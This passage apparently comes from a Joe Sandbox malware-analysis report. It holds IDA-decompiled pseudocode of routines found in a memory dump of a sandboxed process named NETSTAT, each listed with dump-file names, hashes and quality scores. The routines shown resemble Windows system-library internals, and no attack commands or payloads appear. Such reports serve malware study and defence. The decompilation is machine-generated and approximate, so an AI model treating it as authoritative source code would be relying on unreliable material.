                                      				_t38 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                      				if(_t38 != 0) {
                                      					_t40 = _a4;
                                      					 *_t40 = 1;
                                      					E02EAF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                      					_t22 = _v12 >> 1;
                                      					_t32 = 0x2e;
                                      					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                      					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                      					_t23 = E02E9D268(_t38, 1);
                                      					asm("sbb al, al");
                                      					 *_t40 =  ~_t23 + 1;
                                      					L02E877F0(_v16, 0, _t38);
                                      				} else {
                                      					 *_a4 = 0;
                                      					_t29 = 0xc0000017;
                                      				}
                                      				return _t29;
                                      			}












                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction ID: 569ccba2c1eda221b5665367d30277805b784ab552efa33288b18d77f3cb9601
                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction Fuzzy Hash: E911E572544208BFCB05AF5CD8809BEBBB9EF95304F1090AAF988CB350DA329D55D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 42%
                                      			E02E6C962(char __ecx) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t19;
                                      				char _t22;
                                      				void* _t26;
                                      				void* _t27;
                                      				char _t32;
                                      				char _t34;
                                      				void* _t35;
                                      				void* _t37;
                                      				intOrPtr* _t38;
                                      				signed int _t39;
                                      
                                      				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                      				_v8 =  *0x2f5d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                      				_t34 = __ecx;
                                      				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                      					_t26 = 0;
                                      					E02E7EEF0(0x2f570a0);
                                      					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                      					if(E02EEF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                      						L9:
                                      						E02E7EB70(_t29, 0x2f570a0);
                                      						_t19 = _t26;
                                      						L2:
                                      						_pop(_t35);
                                      						_pop(_t37);
                                      						_pop(_t27);
                                      						return E02EAB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                      					}
                                      					_t29 = _t34;
                                      					_t26 = E02EEF1FC(_t34, _t32);
                                      					if(_t26 < 0) {
                                      						goto L9;
                                      					}
                                      					_t38 =  *0x2f570c0; // 0x0
                                      					while(_t38 != 0x2f570c0) {
                                      						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                      						_t38 =  *_t38;
                                      						_v12 = _t22;
                                      						if(_t22 != 0) {
                                      							_t29 = _t22;
                                      							 *0x2f5b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                      							_v12();
                                      						}
                                      					}
                                      					goto L9;
                                      				}
                                      				_t19 = 0;
                                      				goto L2;
                                      			}



















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c63a3b0c67eea3dd27e8af736a3b42adb7458ab922f574c9fc9f1dee5cd00487
                                      • Instruction ID: f80f48f14dcfec7705700dea3876a13c753f99b1a239620ff442c8d4e30cc150
                                      • Opcode Fuzzy Hash: c63a3b0c67eea3dd27e8af736a3b42adb7458ab922f574c9fc9f1dee5cd00487
                                      • Instruction Fuzzy Hash: 43110C327807169FE710AF28CC45A6BF7E6FF88658B046929FE4687650DB20EC11CBD1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E02EA37F5(void* __ecx, intOrPtr* __edx) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed char _t6;
                                      				intOrPtr _t13;
                                      				intOrPtr* _t20;
                                      				intOrPtr* _t27;
                                      				void* _t28;
                                      				intOrPtr* _t29;
                                      
                                      				_t27 = __edx;
                                      				_t28 = __ecx;
                                      				if(__edx == 0) {
                                      					E02E82280(_t6, 0x2f58550);
                                      				}
                                      				_t29 = E02EA387E(_t28);
                                      				if(_t29 == 0) {
                                      					L6:
                                      					if(_t27 == 0) {
                                      						E02E7FFB0(0x2f58550, _t27, 0x2f58550);
                                      					}
                                      					if(_t29 == 0) {
                                      						return 0xc0000225;
                                      					} else {
                                      						if(_t27 != 0) {
                                      							goto L14;
                                      						}
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                      						goto L11;
                                      					}
                                      				} else {
                                      					_t13 =  *_t29;
                                      					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                      						L13:
                                      						_push(3);
                                      						asm("int 0x29");
                                      						L14:
                                      						 *_t27 = _t29;
                                      						L11:
                                      						return 0;
                                      					}
                                      					_t20 =  *((intOrPtr*)(_t29 + 4));
                                      					if( *_t20 != _t29) {
                                      						goto L13;
                                      					}
                                      					 *_t20 = _t13;
                                      					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                      					asm("btr eax, ecx");
                                      					goto L6;
                                      				}
                                      			}












                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8823c9dca817f893082a8509ce1bbbbcd72b9620287796f999a42af805314291
                                      • Instruction ID: 9f4606c7ed002b5ee6c21cbc40c5a55ac041fc560f3baa508c2010914a4bac33
                                      • Opcode Fuzzy Hash: 8823c9dca817f893082a8509ce1bbbbcd72b9620287796f999a42af805314291
                                      • Instruction Fuzzy Hash: 1501DB729816105BC3379B199550E26BBA6DF85B64715D0E9F9498F354D730E801C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E9002D() {
                                      				void* _t11;
                                      				char* _t14;
                                      				signed char* _t16;
                                      				char* _t27;
                                      				signed char* _t29;
                                      
                                      				_t11 = E02E87D50();
                                      				_t27 = 0x7ffe0384;
                                      				if(_t11 != 0) {
                                      					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      				} else {
                                      					_t14 = 0x7ffe0384;
                                      				}
                                      				_t29 = 0x7ffe0385;
                                      				if( *_t14 != 0) {
                                      					if(E02E87D50() == 0) {
                                      						_t16 = 0x7ffe0385;
                                      					} else {
                                      						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      					}
                                      					if(( *_t16 & 0x00000040) != 0) {
                                      						goto L18;
                                      					} else {
                                      						goto L3;
                                      					}
                                      				} else {
                                      					L3:
                                      					if(E02E87D50() != 0) {
                                      						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      					}
                                      					if( *_t27 != 0) {
                                      						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                      							goto L5;
                                      						}
                                      						if(E02E87D50() != 0) {
                                      							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      						}
                                      						if(( *_t29 & 0x00000020) == 0) {
                                      							goto L5;
                                      						}
                                      						L18:
                                      						return 1;
                                      					} else {
                                      						L5:
                                      						return 0;
                                      					}
                                      				}
                                      			}









                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction ID: f0b6cb2df033d763c060bd4715416e54397a1d3369f692614196eb8ca1f25a4e
                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction Fuzzy Hash: 71112B39281680CFDB229764C968B7577D5EF6275CF19B0A1ED18876D2E338C842C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E02E7766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                      				char _v8;
                                      				void* _t22;
                                      				void* _t24;
                                      				intOrPtr _t29;
                                      				intOrPtr* _t30;
                                      				void* _t42;
                                      				intOrPtr _t47;
                                      
                                      				_push(__ecx);
                                      				_t36 =  &_v8;
                                      				if(E02E9F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                      					L10:
                                      					_t22 = 0;
                                      				} else {
                                      					_t24 = _v8 + __ecx;
                                      					_t42 = _t24;
                                      					if(_t24 < __ecx) {
                                      						goto L10;
                                      					} else {
                                      						if(E02E9F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                      							goto L10;
                                      						} else {
                                      							_t29 = _v8 + _t42;
                                      							if(_t29 < _t42) {
                                      								goto L10;
                                      							} else {
                                      								_t47 = _t29;
                                      								_t30 = _a16;
                                      								if(_t30 != 0) {
                                      									 *_t30 = _t47;
                                      								}
                                      								if(_t47 == 0) {
                                      									goto L10;
                                      								} else {
                                      									_t22 = L02E84620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t22;
                                      			}











                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction ID: bd62df1a8bd2122a29c5414645360b82491280fdbd273d0e35ed42a0c853f3b3
                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction Fuzzy Hash: 0D01A732740219AFCB24DE9ECC41E5BB7ADEB84764F249564BD08CB258DA30DD01C7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			E02E69080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                      				intOrPtr* _t51;
                                      				intOrPtr _t59;
                                      				signed int _t64;
                                      				signed int _t67;
                                      				signed int* _t71;
                                      				signed int _t74;
                                      				signed int _t77;
                                      				signed int _t82;
                                      				intOrPtr* _t84;
                                      				void* _t85;
                                      				intOrPtr* _t87;
                                      				void* _t94;
                                      				signed int _t95;
                                      				intOrPtr* _t97;
                                      				signed int _t99;
                                      				signed int _t102;
                                      				void* _t104;
                                      
                                      				_push(__ebx);
                                      				_push(__esi);
                                      				_push(__edi);
                                      				_t97 = __ecx;
                                      				_t102 =  *(__ecx + 0x14);
                                      				if((_t102 & 0x02ffffff) == 0x2000000) {
                                      					_t102 = _t102 | 0x000007d0;
                                      				}
                                      				_t48 =  *[fs:0x30];
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                      					_t102 = _t102 & 0xff000000;
                                      				}
                                      				_t80 = 0x2f585ec;
                                      				E02E82280(_t48, 0x2f585ec);
                                      				_t51 =  *_t97 + 8;
                                      				if( *_t51 != 0) {
                                      					L6:
                                      					return E02E7FFB0(_t80, _t97, _t80);
                                      				} else {
                                      					 *(_t97 + 0x14) = _t102;
                                      					_t84 =  *0x2f5538c; // 0x776f6888
                                      					if( *_t84 != 0x2f55388) {
                                      						_t85 = 3;
                                      						asm("int 0x29");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						asm("int3");
                                      						_push(0x2c);
                                      						_push(0x2f3f6e8);
                                      						E02EBD0E8(0x2f585ec, _t97, _t102);
                                      						 *((char*)(_t104 - 0x1d)) = 0;
                                      						_t99 =  *(_t104 + 8);
                                      						__eflags = _t99;
                                      						if(_t99 == 0) {
                                      							L13:
                                      							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                      							if(__eflags == 0) {
                                      								E02F388F5(_t80, _t85, 0x2f55388, _t99, _t102, __eflags);
                                      							}
                                      						} else {
                                      							__eflags = _t99 -  *0x2f586c0; // 0x3f07b0
                                      							if(__eflags == 0) {
                                      								goto L13;
                                      							} else {
                                      								__eflags = _t99 -  *0x2f586b8; // 0x0
                                      								if(__eflags == 0) {
                                      									goto L13;
                                      								} else {
                                      									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                      									__eflags =  *((char*)(_t59 + 0x28));
                                      									if( *((char*)(_t59 + 0x28)) == 0) {
                                      										E02E82280(_t99 + 0xe0, _t99 + 0xe0);
                                      										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                      										__eflags =  *((char*)(_t99 + 0xe5));
                                      										if(__eflags != 0) {
                                      											E02F388F5(0x2f585ec, _t85, 0x2f55388, _t99, _t102, __eflags);
                                      										} else {
                                      											__eflags =  *((char*)(_t99 + 0xe4));
                                      											if( *((char*)(_t99 + 0xe4)) == 0) {
                                      												 *((char*)(_t99 + 0xe4)) = 1;
                                      												_push(_t99);
                                      												_push( *((intOrPtr*)(_t99 + 0x24)));
                                      												E02EAAFD0();
                                      											}
                                      											while(1) {
                                      												_t71 = _t99 + 8;
                                      												 *(_t104 - 0x2c) = _t71;
                                      												_t80 =  *_t71;
                                      												_t95 = _t71[1];
                                      												 *(_t104 - 0x28) = _t80;
                                      												 *(_t104 - 0x24) = _t95;
                                      												while(1) {
                                      													L19:
                                      													__eflags = _t95;
                                      													if(_t95 == 0) {
                                      														break;
                                      													}
                                      													_t102 = _t80;
                                      													 *(_t104 - 0x30) = _t95;
                                      													 *(_t104 - 0x24) = _t95 - 1;
                                      													asm("lock cmpxchg8b [edi]");
                                      													_t80 = _t102;
                                      													 *(_t104 - 0x28) = _t80;
                                      													 *(_t104 - 0x24) = _t95;
                                      													__eflags = _t80 - _t102;
                                      													_t99 =  *(_t104 + 8);
                                      													if(_t80 != _t102) {
                                      														continue;
                                      													} else {
                                      														__eflags = _t95 -  *(_t104 - 0x30);
                                      														if(_t95 !=  *(_t104 - 0x30)) {
                                      															continue;
                                      														} else {
                                      															__eflags = _t95;
                                      															if(_t95 != 0) {
                                      																_t74 = 0;
                                      																 *(_t104 - 0x34) = 0;
                                      																_t102 = 0;
                                      																__eflags = 0;
                                      																while(1) {
                                      																	 *(_t104 - 0x3c) = _t102;
                                      																	__eflags = _t102 - 3;
                                      																	if(_t102 >= 3) {
                                      																		break;
                                      																	}
                                      																	__eflags = _t74;
                                      																	if(_t74 != 0) {
                                      																		L49:
                                      																		_t102 =  *_t74;
                                      																		__eflags = _t102;
                                      																		if(_t102 != 0) {
                                      																			_t102 =  *(_t102 + 4);
                                      																			__eflags = _t102;
                                      																			if(_t102 != 0) {
                                      																				 *0x2f5b1e0(_t74, _t99);
                                      																				 *_t102();
                                      																			}
                                      																		}
                                      																		do {
                                      																			_t71 = _t99 + 8;
                                      																			 *(_t104 - 0x2c) = _t71;
                                      																			_t80 =  *_t71;
                                      																			_t95 = _t71[1];
                                      																			 *(_t104 - 0x28) = _t80;
                                      																			 *(_t104 - 0x24) = _t95;
                                      																			goto L19;
                                      																		} while (_t74 == 0);
                                      																		goto L49;
                                      																	} else {
                                      																		_t82 = 0;
                                      																		__eflags = 0;
                                      																		while(1) {
                                      																			 *(_t104 - 0x38) = _t82;
                                      																			__eflags = _t82 -  *0x2f584c0;
                                      																			if(_t82 >=  *0x2f584c0) {
                                      																				break;
                                      																			}
                                      																			__eflags = _t74;
                                      																			if(_t74 == 0) {
                                      																				_t77 = E02F39063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                      																				__eflags = _t77;
                                      																				if(_t77 == 0) {
                                      																					_t74 = 0;
                                      																					__eflags = 0;
                                      																				} else {
                                      																					_t74 = _t77 + 0xfffffff4;
                                      																				}
                                      																				 *(_t104 - 0x34) = _t74;
                                      																				_t82 = _t82 + 1;
                                      																				continue;
                                      																			}
                                      																			break;
                                      																		}
                                      																		_t102 = _t102 + 1;
                                      																		continue;
                                      																	}
                                      																	goto L20;
                                      																}
                                      																__eflags = _t74;
                                      															}
                                      														}
                                      													}
                                      													break;
                                      												}
                                      												L20:
                                      												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                      												 *((char*)(_t99 + 0xe5)) = 1;
                                      												 *((char*)(_t104 - 0x1d)) = 1;
                                      												goto L21;
                                      											}
                                      										}
                                      										L21:
                                      										 *(_t104 - 4) = 0xfffffffe;
                                      										E02E6922A(_t99);
                                      										_t64 = E02E87D50();
                                      										__eflags = _t64;
                                      										if(_t64 != 0) {
                                      											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      										} else {
                                      											_t67 = 0x7ffe0386;
                                      										}
                                      										__eflags =  *_t67;
                                      										if( *_t67 != 0) {
                                      											_t67 = E02F38B58(_t99);
                                      										}
                                      										__eflags =  *((char*)(_t104 - 0x1d));
                                      										if( *((char*)(_t104 - 0x1d)) != 0) {
                                      											__eflags = _t99 -  *0x2f586c0; // 0x3f07b0
                                      											if(__eflags != 0) {
                                      												__eflags = _t99 -  *0x2f586b8; // 0x0
                                      												if(__eflags == 0) {
                                      													_t94 = 0x2f586bc;
                                      													_t87 = 0x2f586b8;
                                      													goto L27;
                                      												} else {
                                      													__eflags = _t67 | 0xffffffff;
                                      													asm("lock xadd [edi], eax");
                                      													if(__eflags == 0) {
                                      														E02E69240(_t80, _t99, _t99, _t102, __eflags);
                                      													}
                                      												}
                                      											} else {
                                      												_t94 = 0x2f586c4;
                                      												_t87 = 0x2f586c0;
                                      												L27:
                                      												E02E99B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                      											}
                                      										}
                                      									} else {
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      						return E02EBD130(_t80, _t99, _t102);
                                      					} else {
                                      						 *_t51 = 0x2f55388;
                                      						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                      						 *_t84 = _t51;
                                      						 *0x2f5538c = _t51;
                                      						goto L6;
                                      					}
                                      				}
                                      			}





















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E02EFC450(intOrPtr* _a4) {
                                      				signed char _t25;
                                      				intOrPtr* _t26;
                                      				intOrPtr* _t27;
                                      
                                      				_t26 = _a4;
                                      				_t25 =  *(_t26 + 0x10);
                                      				if((_t25 & 0x00000003) != 1) {
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push( *((intOrPtr*)(_t26 + 8)));
                                      					_push(0);
                                      					_push( *_t26);
                                      					E02EA9910();
                                      					_t25 =  *(_t26 + 0x10);
                                      				}
                                      				if((_t25 & 0x00000001) != 0) {
                                      					_push(4);
                                      					_t7 = _t26 + 4; // 0x4
                                      					_t27 = _t7;
                                      					_push(_t27);
                                      					_push(5);
                                      					_push(0xfffffffe);
                                      					E02EA95B0();
                                      					if( *_t27 != 0) {
                                      						_push( *_t27);
                                      						E02EA95D0();
                                      					}
                                      				}
                                      				_t8 = _t26 + 0x14; // 0x14
                                      				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                      				}
                                      				_push( *_t26);
                                      				E02EA95D0();
                                      				return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                      			}







                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E02F34015(signed int __eax, signed int __ecx) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed char _t10;
                                      				signed int _t28;
                                      
                                      				_push(__ecx);
                                      				_t28 = __ecx;
                                      				asm("lock xadd [edi+0x24], eax");
                                      				_t10 = (__eax | 0xffffffff) - 1;
                                      				if(_t10 == 0) {
                                      					_t1 = _t28 + 0x1c; // 0x1e
                                      					E02E82280(_t10, _t1);
                                      					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                      					E02E82280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2f586ac);
                                      					E02E6F900(0x2f586d4, _t28);
                                      					E02E7FFB0(0x2f586ac, _t28, 0x2f586ac);
                                      					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                      					E02E7FFB0(0, _t28, _t1);
                                      					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                      					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                      					}
                                      					_t10 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                      				}
                                      				return _t10;
                                      			}








                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E02F2138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				short _v54;
                                      				char _v60;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed char* _t21;
                                      				intOrPtr _t27;
                                      				intOrPtr _t33;
                                      				intOrPtr _t34;
                                      				signed int _t35;
                                      
                                      				_t32 = __edx;
                                      				_t27 = __ebx;
                                      				_v8 =  *0x2f5d360 ^ _t35;
                                      				_t33 = __edx;
                                      				_t34 = __ecx;
                                      				E02EAFA60( &_v60, 0, 0x30);
                                      				_v20 = _a4;
                                      				_v16 = _a8;
                                      				_v28 = _t34;
                                      				_v24 = _t33;
                                      				_v54 = 0x1033;
                                      				if(E02E87D50() == 0) {
                                      					_t21 = 0x7ffe0388;
                                      				} else {
                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      				}
                                      				_push( &_v60);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t21 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                      			}


















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E02F214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				short _v54;
                                      				char _v60;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed char* _t21;
                                      				intOrPtr _t27;
                                      				intOrPtr _t33;
                                      				intOrPtr _t34;
                                      				signed int _t35;
                                      
                                      				_t32 = __edx;
                                      				_t27 = __ebx;
                                      				_v8 =  *0x2f5d360 ^ _t35;
                                      				_t33 = __edx;
                                      				_t34 = __ecx;
                                      				E02EAFA60( &_v60, 0, 0x30);
                                      				_v20 = _a4;
                                      				_v16 = _a8;
                                      				_v28 = _t34;
                                      				_v24 = _t33;
                                      				_v54 = 0x1034;
                                      				if(E02E87D50() == 0) {
                                      					_t21 = 0x7ffe0388;
                                      				} else {
                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      				}
                                      				_push( &_v60);
                                      				_push(0x10);
                                      				_push(0x20402);
                                      				_push( *_t21 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                      			}


















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4edd049d26a89c70e1ef6bd10b9d3a4f07c649078b1504b39e4ccd3da1896b20
                                      • Instruction ID: 9bca3f4d037904406c2cd4c2649e45c2f7450da925fbf29d142f7e4857f7a468
                                      • Opcode Fuzzy Hash: 4edd049d26a89c70e1ef6bd10b9d3a4f07c649078b1504b39e4ccd3da1896b20
                                      • Instruction Fuzzy Hash: 5C019275A4125CAFCB10DFA8D842EAEB7B8EF45700F004056F919EB381D670EA00CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E02E658EC(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				char _v28;
                                      				char _v44;
                                      				char _v76;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t10;
                                      				intOrPtr _t16;
                                      				intOrPtr _t17;
                                      				intOrPtr _t27;
                                      				intOrPtr _t28;
                                      				signed int _t29;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t29;
                                      				_t10 =  *[fs:0x30];
                                      				_t27 = __ecx;
                                      				if(_t10 == 0) {
                                      					L6:
                                      					_t28 = 0x2e45c80;
                                      				} else {
                                      					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                      					if(_t16 == 0) {
                                      						goto L6;
                                      					} else {
                                      						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                      					}
                                      				}
                                      				if(E02E65943() != 0 &&  *0x2f55320 > 5) {
                                      					E02EE7B5E( &_v44, _t27);
                                      					_t22 =  &_v28;
                                      					E02EE7B5E( &_v28, _t28);
                                      					_t11 = E02EE7B9C(0x2f55320, 0x2e4bf15,  &_v28, _t22, 4,  &_v76);
